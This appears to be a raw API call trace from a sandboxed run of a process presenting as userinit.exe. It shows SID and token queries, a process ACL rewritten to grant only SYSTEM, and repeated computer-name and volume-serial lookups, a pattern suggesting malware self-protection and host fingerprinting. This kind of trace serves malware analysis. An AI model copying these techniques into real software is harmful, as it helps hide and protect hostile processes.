[0170.121] GetProcAddress (hModule=0x75370000, lpProcName="GetLastError") returned 0x753bbf00
[0170.121] GetLastError () returned 0x7a
[0170.122] GetModuleHandleA (lpModuleName="kernel32.dll") returned 0x75370000
[0170.122] GetProcAddress (hModule=0x75370000, lpProcName="HeapAlloc") returned 0x76f72dd6
[0170.122] GetTokenInformation (in: TokenHandle=0x1d0, TokenInformationClass=0x1, TokenInformation=0x2e0780, TokenInformationLength=0x24, ReturnLength=0x1aecd0 | out: TokenInformation=0x2e0780, ReturnLength=0x1aecd0) returned 1
[0170.122] CopySid (in: nDestinationSidLength=0x44, pDestinationSid=0x295fab0, pSourceSid=0x2e0788*(Revision=0x1, SubAuthorityCount=0x5, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x5), SubAuthority=([0]=0x15, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x65)) | out: pDestinationSid=0x295fab0*(Revision=0x1, SubAuthorityCount=0x5, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x5), SubAuthority=([0]=0x15, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x65))) returned 1
[0170.122] IsValidSid (pSid=0x295fab0*(Revision=0x1, SubAuthorityCount=0x5, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x5), SubAuthority=([0]=0x15, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x65))) returned 1
[0170.122] ConvertSidToStringSidA () returned 0x1
[0170.122] LocalFree (hMem=0x2d9e80) returned 0x0
[0170.122] GetModuleHandleA (lpModuleName="kernel32.dll") returned 0x75370000
[0170.122] GetProcAddress (hModule=0x75370000, lpProcName="HeapFree") returned 0x753bbbd0
[0170.122] CopySid (in: nDestinationSidLength=0x44, pDestinationSid=0x295fb34, pSourceSid=0x295fab0*(Revision=0x1, SubAuthorityCount=0x5, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x5), SubAuthority=([0]=0x15, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x65)) | out: pDestinationSid=0x295fb34*(Revision=0x1, SubAuthorityCount=0x5, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x5), SubAuthority=([0]=0x15, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x65))) returned 1
[0170.122] IsValidSid (pSid=0x295fb34*(Revision=0x1, SubAuthorityCount=0x5, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x5), SubAuthority=([0]=0x15, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x65))) returned 1
[0170.122] ConvertSidToStringSidA () returned 0x1
[0170.122] LocalFree (hMem=0x2d9e80) returned 0x0
[0170.122] IsValidSid (pSid=0x295fb34*(Revision=0x1, SubAuthorityCount=0x5, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x5), SubAuthority=([0]=0x15, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x65))) returned 1
[0170.122] GetModuleHandleA (lpModuleName="kernel32.dll") returned 0x75370000
[0170.122] GetProcAddress (hModule=0x75370000, lpProcName="CloseHandle") returned 0x753bca7c
[0170.122] CloseHandle (hObject=0x1d0) returned 1
[0170.123] ConvertStringSidToSidA () returned 0x1
[0170.123] CopySid (in: nDestinationSidLength=0x44, pDestinationSid=0x295fa54, pSourceSid=0x2e6f40*(Revision=0x1, SubAuthorityCount=0x1, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x10), SubAuthority=0x1000) | out: pDestinationSid=0x295fa54*(Revision=0x1, SubAuthorityCount=0x1, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x10), SubAuthority=0x1000)) returned 1
[0170.123] IsValidSid (pSid=0x295fa54*(Revision=0x1, SubAuthorityCount=0x1, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x10), SubAuthority=0x1000)) returned 1
[0170.123] ConvertSidToStringSidA () returned 0x1
[0170.123] LocalFree (hMem=0x2e6f58) returned 0x0
[0170.123] LocalFree (hMem=0x2e6f40) returned 0x0
[0170.123] ConvertStringSidToSidA () returned 0x1
[0170.123] CopySid (in: nDestinationSidLength=0x44, pDestinationSid=0x295fae0, pSourceSid=0x2e6f40*(Revision=0x1, SubAuthorityCount=0x1, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x10), SubAuthority=0x2000) | out: pDestinationSid=0x295fae0*(Revision=0x1, SubAuthorityCount=0x1, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x10), SubAuthority=0x2000)) returned 1
[0170.123] IsValidSid (pSid=0x295fae0*(Revision=0x1, SubAuthorityCount=0x1, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x10), SubAuthority=0x2000)) returned 1
[0170.123] ConvertSidToStringSidA () returned 0x1
[0170.123] LocalFree (hMem=0x2e6f58) returned 0x0
[0170.123] LocalFree (hMem=0x2e6f40) returned 0x0
[0170.123] ConvertStringSidToSidA () returned 0x1
[0170.123] CopySid (in: nDestinationSidLength=0x44, pDestinationSid=0x295fbfc, pSourceSid=0x2e6f40*(Revision=0x1, SubAuthorityCount=0x1, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x10), SubAuthority=0x3000) | out: pDestinationSid=0x295fbfc*(Revision=0x1, SubAuthorityCount=0x1, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x10), SubAuthority=0x3000)) returned 1
[0170.123] IsValidSid (pSid=0x295fbfc*(Revision=0x1, SubAuthorityCount=0x1, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x10), SubAuthority=0x3000)) returned 1
[0170.123] ConvertSidToStringSidA () returned 0x1
[0170.123] LocalFree (hMem=0x2e6f58) returned 0x0
[0170.123] LocalFree (hMem=0x2e6f40) returned 0x0
[0170.123] ConvertStringSidToSidA () returned 0x1
[0170.123] CopySid (in: nDestinationSidLength=0x44, pDestinationSid=0x295fc8c, pSourceSid=0x2e6f40*(Revision=0x1, SubAuthorityCount=0x1, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x10), SubAuthority=0x4000) | out: pDestinationSid=0x295fc8c*(Revision=0x1, SubAuthorityCount=0x1, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x10), SubAuthority=0x4000)) returned 1
[0170.123] IsValidSid (pSid=0x295fc8c*(Revision=0x1, SubAuthorityCount=0x1, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x10), SubAuthority=0x4000)) returned 1
[0170.123] ConvertSidToStringSidA () returned 0x1
[0170.123] LocalFree (hMem=0x2e6f58) returned 0x0
[0170.123] LocalFree (hMem=0x2e6f40) returned 0x0
[0170.123] ConvertStringSidToSidA () returned 0x1
[0170.123] CopySid (in: nDestinationSidLength=0x44, pDestinationSid=0x295fd1c, pSourceSid=0x2e6f40*(Revision=0x1, SubAuthorityCount=0x1, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x10), SubAuthority=0x5000) | out: pDestinationSid=0x295fd1c*(Revision=0x1, SubAuthorityCount=0x1, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x10), SubAuthority=0x5000)) returned 1
[0170.123] IsValidSid (pSid=0x295fd1c*(Revision=0x1, SubAuthorityCount=0x1, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x10), SubAuthority=0x5000)) returned 1
[0170.123] ConvertSidToStringSidA () returned 0x1
[0170.123] LocalFree (hMem=0x2e6f58) returned 0x0
[0170.123] LocalFree (hMem=0x2e6f40) returned 0x0
[0170.123] GetCurrentProcessId () returned 0x844
[0170.123] OpenProcess (dwDesiredAccess=0x60000, bInheritHandle=0, dwProcessId=0x844) returned 0x1d0
[0170.124] GetModuleHandleA (lpModuleName="advapi32.dll") returned 0x76da0000
[0170.124] GetProcAddress (hModule=0x76da0000, lpProcName="GetSecurityInfo") returned 0x76dab3e4
[0170.124] GetSecurityInfo () returned 0x0
[0170.126] GetModuleHandleA (lpModuleName="advapi32.dll") returned 0x76da0000
[0170.127] GetProcAddress (hModule=0x76da0000, lpProcName="GetSecurityDescriptorControl") returned 0x76daaddf
[0170.127] GetSecurityDescriptorControl (in: pSecurityDescriptor=0x2e0f28, pControl=0x1aea72, lpdwRevision=0x1aea6c | out: pControl=0x1aea72, lpdwRevision=0x1aea6c) returned 1
[0170.127] GetModuleHandleA (lpModuleName="advapi32.dll") returned 0x76da0000
[0170.127] GetProcAddress (hModule=0x76da0000, lpProcName="GetSecurityDescriptorOwner") returned 0x76daadf7
[0170.127] GetSecurityDescriptorOwner (in: pSecurityDescriptor=0x2e0f28, pOwner=0x1aea68, lpbOwnerDefaulted=0x1aea5c | out: pOwner=0x1aea68*=0x0, lpbOwnerDefaulted=0x1aea5c) returned 1
[0170.127] GetModuleHandleA (lpModuleName="advapi32.dll") returned 0x76da0000
[0170.127] GetProcAddress (hModule=0x76da0000, lpProcName="GetSecurityDescriptorGroup") returned 0x76daae27
[0170.127] GetSecurityDescriptorGroup (in: pSecurityDescriptor=0x2e0f28, pGroup=0x1aea68, lpbGroupDefaulted=0x1aea5c | out: pGroup=0x1aea68*=0x0, lpbGroupDefaulted=0x1aea5c) returned 1
[0170.127] GetModuleHandleA (lpModuleName="advapi32.dll") returned 0x76da0000
[0170.127] GetProcAddress (hModule=0x76da0000, lpProcName="GetSecurityDescriptorDacl") returned 0x76db41a6
[0170.127] GetSecurityDescriptorDacl (in: pSecurityDescriptor=0x2e0f28, lpbDaclPresent=0x1aea60, pDacl=0x1aea54, lpbDaclDefaulted=0x1aea5c | out: lpbDaclPresent=0x1aea60, pDacl=0x1aea54, lpbDaclDefaulted=0x1aea5c) returned 1
[0170.128] GetModuleHandleA (lpModuleName="advapi32.dll") returned 0x76da0000
[0170.128] GetProcAddress (hModule=0x76da0000, lpProcName="IsValidAcl") returned 0x76da8523
[0170.128] IsValidAcl (pAcl=0x2e0f3c) returned 1
[0170.128] GetModuleHandleA (lpModuleName="advapi32.dll") returned 0x76da0000
[0170.128] GetProcAddress (hModule=0x76da0000, lpProcName="GetAce") returned 0x76db45f0
[0170.128] GetAce (in: pAcl=0x2e0f3c, dwAceIndex=0x0, pAce=0x1ae8f4 | out: pAce=0x1ae8f4*=0x2e0f44) returned 1
[0170.128] CopySid (in: nDestinationSidLength=0x44, pDestinationSid=0x295fe74, pSourceSid=0x2e0f4c*(Revision=0x1, SubAuthorityCount=0x2, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x5), SubAuthority=([0]=0x20, [1]=0x0)) | out: pDestinationSid=0x295fe74*(Revision=0x1, SubAuthorityCount=0x2, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x5), SubAuthority=([0]=0x20, [1]=0x0))) returned 1
[0170.128] IsValidSid (pSid=0x295fe74*(Revision=0x1, SubAuthorityCount=0x2, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x5), SubAuthority=([0]=0x20, [1]=0x0))) returned 1
[0170.128] ConvertSidToStringSidA () returned 0x1
[0170.128] LocalFree (hMem=0x2e7018) returned 0x0
[0170.128] GetAce (in: pAcl=0x2e0f3c, dwAceIndex=0x1, pAce=0x1ae8f4 | out: pAce=0x1ae8f4*=0x2e0f5c) returned 1
[0170.128] CopySid (in: nDestinationSidLength=0x44, pDestinationSid=0x295ff60, pSourceSid=0x2e0f64*(Revision=0x1, SubAuthorityCount=0x1, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x5), SubAuthority=0x12) | out: pDestinationSid=0x295ff60*(Revision=0x1, SubAuthorityCount=0x1, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x5), SubAuthority=0x12)) returned 1
[0170.128] IsValidSid (pSid=0x295ff60*(Revision=0x1, SubAuthorityCount=0x1, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x5), SubAuthority=0x12)) returned 1
[0170.128] ConvertSidToStringSidA () returned 0x1
[0170.128] LocalFree (hMem=0x2e7018) returned 0x0
[0170.128] GetAce (in: pAcl=0x2e0f3c, dwAceIndex=0x2, pAce=0x1ae8f4 | out: pAce=0x1ae8f4*=0x2e0f70) returned 1
[0170.128] CopySid (in: nDestinationSidLength=0x44, pDestinationSid=0x29529c0, pSourceSid=0x2e0f78*(Revision=0x1, SubAuthorityCount=0x3, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x5), SubAuthority=([0]=0x5, [1]=0x0, [2]=0x0)) | out: pDestinationSid=0x29529c0*(Revision=0x1, SubAuthorityCount=0x3, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x5), SubAuthority=([0]=0x5, [1]=0x0, [2]=0x0))) returned 1
[0170.128] IsValidSid (pSid=0x29529c0*(Revision=0x1, SubAuthorityCount=0x3, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x5), SubAuthority=([0]=0x5, [1]=0x0, [2]=0x0))) returned 1
[0170.128] ConvertSidToStringSidA () returned 0x1
[0170.128] LocalFree (hMem=0x2e7018) returned 0x0
[0170.129] GetModuleHandleA (lpModuleName="advapi32.dll") returned 0x76da0000
[0170.129] GetProcAddress (hModule=0x76da0000, lpProcName="GetSecurityDescriptorSacl") returned 0x76db4608
[0170.129] GetSecurityDescriptorSacl (in: pSecurityDescriptor=0x2e0f28, lpbSaclPresent=0x1aea64, pSacl=0x1aea58, lpbSaclDefaulted=0x1aea5c | out: lpbSaclPresent=0x1aea64, pSacl=0x1aea58, lpbSaclDefaulted=0x1aea5c) returned 1
[0170.129] LocalFree (hMem=0x2e0f28) returned 0x0
[0170.129] IsValidSid (pSid=0x295f614*(Revision=0x1, SubAuthorityCount=0x1, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x5), SubAuthority=0x12)) returned 1
[0170.129] GetModuleHandleA (lpModuleName="advapi32.dll") returned 0x76da0000
[0170.129] GetProcAddress (hModule=0x76da0000, lpProcName="GetLengthSid") returned 0x76db413b
[0170.129] GetLengthSid (pSid=0x295f614*(Revision=0x1, SubAuthorityCount=0x1, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x5), SubAuthority=0x12)) returned 0xc
[0170.129] GetLastError () returned 0x0
[0170.129] GetModuleHandleA (lpModuleName="kernel32.dll") returned 0x75370000
[0170.129] GetProcAddress (hModule=0x75370000, lpProcName="GlobalAlloc") returned 0x753b9ce1
[0170.129] GetModuleHandleA (lpModuleName="advapi32.dll") returned 0x76da0000
[0170.129] GetProcAddress (hModule=0x76da0000, lpProcName="InitializeAcl") returned 0x76db45cd
[0170.129] InitializeAcl (in: pAcl=0x2e7fa8, nAclLength=0x1c, dwAclRevision=0x2 | out: pAcl=0x2e7fa8) returned 1
[0170.129] IsValidSid (pSid=0x295f614*(Revision=0x1, SubAuthorityCount=0x1, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x5), SubAuthority=0x12)) returned 1
[0170.129] GetLengthSid (pSid=0x295f614*(Revision=0x1, SubAuthorityCount=0x1, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x5), SubAuthority=0x12)) returned 0xc
[0170.130] GetLastError () returned 0x0
[0170.130] IsValidSid (pSid=0x295f614*(Revision=0x1, SubAuthorityCount=0x1, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x5), SubAuthority=0x12)) returned 1
[0170.130] GetModuleHandleA (lpModuleName="kernel32.dll") returned 0x75370000
[0170.130] GetProcAddress (hModule=0x75370000, lpProcName="SetLastError") returned 0x753bbb08
[0170.130] SetLastError (dwErrCode=0x0)
[0170.130] GetModuleHandleA (lpModuleName="advapi32.dll") returned 0x76da0000
[0170.130] GetProcAddress (hModule=0x76da0000, lpProcName="GetSidSubAuthorityCount") returned 0x76db0e0c
[0170.130] GetSidSubAuthorityCount (pSid=0x295f614*(Revision=0x1, SubAuthorityCount=0x1, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x5), SubAuthority=0x12)) returned 0x295f615
[0170.130] GetLastError () returned 0x0
[0170.130] IsValidSid (pSid=0x295f614*(Revision=0x1, SubAuthorityCount=0x1, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x5), SubAuthority=0x12)) returned 1
[0170.130] SetLastError (dwErrCode=0x0)
[0170.130] GetModuleHandleA (lpModuleName="advapi32.dll") returned 0x76da0000
[0170.130] GetProcAddress (hModule=0x76da0000, lpProcName="GetSidIdentifierAuthority") returned 0x76daa935
[0170.130] GetSidIdentifierAuthority (pSid=0x295f614*(Revision=0x1, SubAuthorityCount=0x1, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x5), SubAuthority=0x12)) returned 0x295f616
[0170.130] GetLastError () returned 0x0
[0170.130] IsValidSid (pSid=0x295f614*(Revision=0x1, SubAuthorityCount=0x1, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x5), SubAuthority=0x12)) returned 1
[0170.130] IsValidSid (pSid=0x295f614*(Revision=0x1, SubAuthorityCount=0x1, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x5), SubAuthority=0x12)) returned 1
[0170.130] SetLastError (dwErrCode=0x0)
[0170.131] GetSidSubAuthorityCount (pSid=0x295f614*(Revision=0x1, SubAuthorityCount=0x1, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x5), SubAuthority=0x12)) returned 0x295f615
[0170.131] GetLastError () returned 0x0
[0170.131] SetLastError (dwErrCode=0x0)
[0170.131] GetModuleHandleA (lpModuleName="advapi32.dll") returned 0x76da0000
[0170.131] GetProcAddress (hModule=0x76da0000, lpProcName="GetSidSubAuthority") returned 0x76db0e24
[0170.131] GetSidSubAuthority (pSid=0x295f614*(Revision=0x1, SubAuthorityCount=0x1, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x5), SubAuthority=0x12), nSubAuthority=0x0) returned 0x295f61c
[0170.131] GetLastError () returned 0x0
[0170.131] IsValidSid (pSid=0x295f614*(Revision=0x1, SubAuthorityCount=0x1, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x5), SubAuthority=0x12)) returned 1
[0170.131] GetLengthSid (pSid=0x295f614*(Revision=0x1, SubAuthorityCount=0x1, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x5), SubAuthority=0x12)) returned 0xc
[0170.131] GetLastError () returned 0x0
[0170.131] GetModuleHandleA (lpModuleName="advapi32.dll") returned 0x76da0000
[0170.131] GetProcAddress (hModule=0x76da0000, lpProcName="AddAce") returned 0x76daae0f
[0170.131] AddAce (in: pAcl=0x2e7fa8, dwAceRevision=0x2, dwStartingAceIndex=0xffffffff, pAceList=0x2d2f90, nAceListLength=0x14 | out: pAcl=0x2e7fa8) returned 1
[0170.131] GetModuleHandleA (lpModuleName="kernel32.dll") returned 0x75370000
[0170.131] GetProcAddress (hModule=0x75370000, lpProcName="GlobalFree") returned 0x753b9cf9
[0170.132] GetModuleHandleA (lpModuleName="advapi32.dll") returned 0x76da0000
[0170.132] GetProcAddress (hModule=0x76da0000, lpProcName="SetSecurityInfo") returned 0x76da9edf
[0170.132] SetSecurityInfo () returned 0x0
[0170.132] CloseHandle (hObject=0x1d0) returned 1
[0170.132] GetComputerNameA (in: lpBuffer=0x295fd84, nSize=0x1aed2c | out: lpBuffer="CRH2YWU7", nSize=0x1aed2c) returned 1
[0170.132] GetModuleFileNameA (in: hModule=0x0, lpFilename=0x1aec18, nSize=0x105 | out: lpFilename="C:\\Windows\\System32\\userinit.exe" (normalized: "c:\\windows\\system32\\userinit.exe")) returned 0x20
[0170.132] GetVolumeInformationA (in: lpRootPathName="C:\\", lpVolumeNameBuffer=0x1aed14, nVolumeNameSize=0xc, lpVolumeSerialNumber=0x1aed28, lpMaximumComponentLength=0x1aed24, lpFileSystemFlags=0x1aed20, lpFileSystemNameBuffer=0x0, nFileSystemNameSize=0x0 | out: lpVolumeNameBuffer="SYSTEM", lpVolumeSerialNumber=0x1aed28*=0x90c08a66, lpMaximumComponentLength=0x1aed24*=0xff, lpFileSystemFlags=0x1aed20*=0x3e700ff, lpFileSystemNameBuffer=0x0) returned 1
[0170.133] GetModuleFileNameA (in: hModule=0x0, lpFilename=0x1aec20, nSize=0x105 | out: lpFilename="C:\\Windows\\System32\\userinit.exe" (normalized: "c:\\windows\\system32\\userinit.exe")) returned 0x20
[0170.133] GetVolumeInformationA (in: lpRootPathName="C:\\", lpVolumeNameBuffer=0x1aed14, nVolumeNameSize=0xc, lpVolumeSerialNumber=0x1aed28, lpMaximumComponentLength=0x1aed24, lpFileSystemFlags=0x1aed20, lpFileSystemNameBuffer=0x0, nFileSystemNameSize=0x0 | out: lpVolumeNameBuffer="SYSTEM", lpVolumeSerialNumber=0x1aed28*=0x90c08a66, lpMaximumComponentLength=0x1aed24*=0xff, lpFileSystemFlags=0x1aed20*=0x3e700ff, lpFileSystemNameBuffer=0x0) returned 1
[0170.133] GetModuleFileNameA (in: hModule=0x0, lpFilename=0x1aec20, nSize=0x105 | out: lpFilename="C:\\Windows\\System32\\userinit.exe" (normalized: "c:\\windows\\system32\\userinit.exe")) returned 0x20
[0170.133] VirtualAlloc (lpAddress=0x2960000, dwSize=0x4000, flAllocationType=0x1000, flProtect=0x4) returned 0x2960000
[0170.133] GetVolumeInformationA (in: lpRootPathName="C:\\", lpVolumeNameBuffer=0x1aed14, nVolumeNameSize=0xc, lpVolumeSerialNumber=0x1aed28, lpMaximumComponentLength=0x1aed24, lpFileSystemFlags=0x1aed20, lpFileSystemNameBuffer=0x0, nFileSystemNameSize=0x0 | out: lpVolumeNameBuffer="SYSTEM", lpVolumeSerialNumber=0x1aed28*=0x90c08a66, lpMaximumComponentLength=0x1aed24*=0xff, lpFileSystemFlags=0x1aed20*=0x3e700ff, lpFileSystemNameBuffer=0x0) returned 1
[0170.134] GetModuleFileNameA (in: hModule=0x0, lpFilename=0x1aec18, nSize=0x105 | out: lpFilename="C:\\Windows\\System32\\userinit.exe" (normalized: "c:\\windows\\system32\\userinit.exe")) returned 0x20
[0170.134] GetVolumeInformationA (in: lpRootPathName="C:\\", lpVolumeNameBuffer=0x1aed14, nVolumeNameSize=0xc, lpVolumeSerialNumber=0x1aed28, lpMaximumComponentLength=0x1aed24, lpFileSystemFlags=0x1aed20, lpFileSystemNameBuffer=0x0, nFileSystemNameSize=0x0 | out: lpVolumeNameBuffer="SYSTEM", lpVolumeSerialNumber=0x1aed28*=0x90c08a66, lpMaximumComponentLength=0x1aed24*=0xff, lpFileSystemFlags=0x1aed20*=0x3e700ff, lpFileSystemNameBuffer=0x0) returned 1
[0170.134] GetModuleFileNameA (in: hModule=0x0, lpFilename=0x1aec18, nSize=0x105 | out: lpFilename="C:\\Windows\\System32\\userinit.exe" (normalized: "c:\\windows\\system32\\userinit.exe")) returned 0x20
[0170.134] GetVolumeInformationA (in: lpRootPathName="C:\\", lpVolumeNameBuffer=0x1aed14, nVolumeNameSize=0xc, lpVolumeSerialNumber=0x1aed28, lpMaximumComponentLength=0x1aed24, lpFileSystemFlags=0x1aed20, lpFileSystemNameBuffer=0x0, nFileSystemNameSize=0x0 | out: lpVolumeNameBuffer="SYSTEM", lpVolumeSerialNumber=0x1aed28*=0x90c08a66, lpMaximumComponentLength=0x1aed24*=0xff, lpFileSystemFlags=0x1aed20*=0x3e700ff, lpFileSystemNameBuffer=0x0) returned 1
[0170.134] GetModuleFileNameA (in: hModule=0x0, lpFilename=0x1aec18, nSize=0x105 | out: lpFilename="C:\\Windows\\System32\\userinit.exe" (normalized: "c:\\windows\\system32\\userinit.exe")) returned 0x20
[0170.134] GetVolumeInformationA (in: lpRootPathName="C:\\", lpVolumeNameBuffer=0x1aed14, nVolumeNameSize=0xc, lpVolumeSerialNumber=0x1aed28, lpMaximumComponentLength=0x1aed24, lpFileSystemFlags=0x1aed20, lpFileSystemNameBuffer=0x0, nFileSystemNameSize=0x0 | out: lpVolumeNameBuffer="SYSTEM", lpVolumeSerialNumber=0x1aed28*=0x90c08a66, lpMaximumComponentLength=0x1aed24*=0xff, lpFileSystemFlags=0x1aed20*=0x3e700ff, lpFileSystemNameBuffer=0x0) returned 1
[0170.134] GetModuleFileNameA (in: hModule=0x0, lpFilename=0x1aec18, nSize=0x105 | out: lpFilename="C:\\Windows\\System32\\userinit.exe" (normalized: "c:\\windows\\system32\\userinit.exe")) returned 0x20
[0170.134] GetVolumeInformationA (in: lpRootPathName="C:\\", lpVolumeNameBuffer=0x1aed14, nVolumeNameSize=0xc, lpVolumeSerialNumber=0x1aed28, lpMaximumComponentLength=0x1aed24, lpFileSystemFlags=0x1aed20, lpFileSystemNameBuffer=0x0, nFileSystemNameSize=0x0 | out: lpVolumeNameBuffer="SYSTEM", lpVolumeSerialNumber=0x1aed28*=0x90c08a66, lpMaximumComponentLength=0x1aed24*=0xff, lpFileSystemFlags=0x1aed20*=0x3e700ff, lpFileSystemNameBuffer=0x0) returned 1
[0170.135] GetModuleFileNameA (in: hModule=0x0, lpFilename=0x1aec18, nSize=0x105 | out: lpFilename="C:\\Windows\\System32\\userinit.exe" (normalized: "c:\\windows\\system32\\userinit.exe")) returned 0x20
[0170.135] GetVolumeInformationA (in: lpRootPathName="C:\\", lpVolumeNameBuffer=0x1aed14, nVolumeNameSize=0xc, lpVolumeSerialNumber=0x1aed28, lpMaximumComponentLength=0x1aed24, lpFileSystemFlags=0x1aed20, lpFileSystemNameBuffer=0x0, nFileSystemNameSize=0x0 | out: lpVolumeNameBuffer="SYSTEM", lpVolumeSerialNumber=0x1aed28*=0x90c08a66, lpMaximumComponentLength=0x1aed24*=0xff, lpFileSystemFlags=0x1aed20*=0x3e700ff, lpFileSystemNameBuffer=0x0) returned 1
[0170.135] GetModuleFileNameA (in: hModule=0x0, lpFilename=0x1aec18, nSize=0x105 | out: lpFilename="C:\\Windows\\System32\\userinit.exe" (normalized: "c:\\windows\\system32\\userinit.exe")) returned 0x20
[0170.135] GetVolumeInformationA (in: lpRootPathName="C:\\", lpVolumeNameBuffer=0x1aed14, nVolumeNameSize=0xc, lpVolumeSerialNumber=0x1aed28, lpMaximumComponentLength=0x1aed24, lpFileSystemFlags=0x1aed20, lpFileSystemNameBuffer=0x0, nFileSystemNameSize=0x0 | out: lpVolumeNameBuffer="SYSTEM", lpVolumeSerialNumber=0x1aed28*=0x90c08a66, lpMaximumComponentLength=0x1aed24*=0xff, lpFileSystemFlags=0x1aed20*=0x3e700ff, lpFileSystemNameBuffer=0x0) returned 1
[0170.135] GetModuleFileNameA (in: hModule=0x0, lpFilename=0x1aec18, nSize=0x105 | out: lpFilename="C:\\Windows\\System32\\userinit.exe" (normalized: "c:\\windows\\system32\\userinit.exe")) returned 0x20
[0170.135] GetVolumeInformationA (in: lpRootPathName="C:\\", lpVolumeNameBuffer=0x1aed14, nVolumeNameSize=0xc, lpVolumeSerialNumber=0x1aed28, lpMaximumComponentLength=0x1aed24, lpFileSystemFlags=0x1aed20, lpFileSystemNameBuffer=0x0, nFileSystemNameSize=0x0 | out: lpVolumeNameBuffer="SYSTEM", lpVolumeSerialNumber=0x1aed28*=0x90c08a66, lpMaximumComponentLength=0x1aed24*=0xff, lpFileSystemFlags=0x1aed20*=0x3e700ff, lpFileSystemNameBuffer=0x0) returned 1
[0170.135] GetModuleFileNameA (in: hModule=0x0, lpFilename=0x1aec18, nSize=0x105 | out: lpFilename="C:\\Windows\\System32\\userinit.exe" (normalized: "c:\\windows\\system32\\userinit.exe")) returned 0x20
